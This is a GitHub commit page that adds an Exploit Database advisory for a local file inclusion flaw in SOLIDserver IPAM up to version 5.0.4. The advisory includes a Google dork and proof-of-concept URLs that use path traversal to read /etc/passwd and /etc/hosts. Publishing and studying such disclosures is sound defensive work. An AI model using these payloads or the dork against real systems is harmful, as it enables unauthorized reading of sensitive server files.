Skip to content

Commit 897e728

Browse files
author
Offensive Security
committed
DB: 2016-02-21
1 new exploits
1 parent e149b72 commit 897e728

3 files changed

Lines changed: 37 additions & 3 deletions

File tree

files.csv

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -35715,3 +35715,4 @@ id,file,description,date,author,platform,type,port
3571535715
39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - webssx.sys Driver DoS Vulnerability",2016-02-19,"Fitzl Csaba",windows,dos,0
3571635716
39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
3571735717
39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
35718+
39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion Vulnerability",2016-02-20,"Saeed reza Zamanian",php,webapps,0

platforms/linux/local/75.c

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -96,6 +96,6 @@ else
9696
rm -rf ${TMPDIR}/mansh
9797
fi
9898
exit
99-
100-
101-
// milw0rm.com [2003-08-06]
99+
100+
101+
// milw0rm.com [2003-08-06]

platforms/php/webapps/39478.txt

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
Title: SOLIDserver <=5.0.4 - Local File Inclusion Vunerability
2+
Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
3+
4+
Product: SOLIDserver
5+
Tested Version: : 5.0.4 and 4.0.2
6+
Vendor: efficient IP http://www.efficientip.com
7+
Google Dork: SOLIDserver login
8+
Date: 17 Feb 2016
9+
10+
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
11+
12+
13+
About Product :
14+
---------------
15+
EfficientIP's IP Address Management (IPAM) solution adapts to business and IT goals and objectives by allowing the creation of specific IPAM and VLANs deployment processes.
16+
SOLIDserver™ IPAM is a unified solution that allows you to design, deploy, and manage the IP addressing plan automatically applying allocation rules and simplifying deployments.
17+
18+
Vulnerability Details:
19+
----------------------
20+
Based on a code review done on the product , this product doesn't have any observation on some parameters, that make the attacker able to read file contents.
21+
22+
PoC 1:
23+
-----
24+
https://www.site.com/mod/system/report_download.php?report_filename=/etc/passwd
25+
or
26+
view-source:https://www.site.com/mod/system/report_download.php?report_filename=../../../../../../../../../../../../etc/passwd
27+
28+
PoC 2 : [login authentication required]
29+
------
30+
https://www.site.com/mod/generic/download_config_file.php?config_file=../../../../../../../../../../../../../../etc/hosts
31+
32+
33+
#EOF

0 commit comments

Comments
 (0)